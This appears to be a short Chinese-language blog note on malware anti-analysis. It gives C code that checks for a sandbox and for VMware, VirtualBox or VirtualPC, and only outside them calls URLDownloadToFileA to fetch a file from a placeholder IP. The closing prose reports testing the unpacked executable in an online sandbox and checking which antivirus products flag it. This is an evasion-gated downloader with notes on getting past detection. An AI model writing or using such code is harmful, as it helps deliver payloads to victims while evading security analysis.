1.检查是否在沙箱中
2.检查是否在虚拟机中
int main()
{
if (CheckSandBox())
{
printf("work\n");
if (CheckVMWare() || CheckVirtualBox() || CheckVirtualPC())
{
printf("虚拟机\n");
}
else
{
URLDownloadToFileA(NULL, "http://xx.xx.xx.xx/1.gif", "1.jpg", 0, NULL);
}
}
else {
printf("no work\n");
}
system("pause");
}
首先将不加壳的exe上传到某云沙箱中,因为用了字符串比较函数比较父进程是否是Explorer,这就触发了沙箱中的一个行为检测
这里很奇怪,检测的截图结果是这些
没有打印出work或者no work 无法判断是否能检测成功沙箱
这里杀软是不杀的 但是在实际测试中360杀毒是会杀的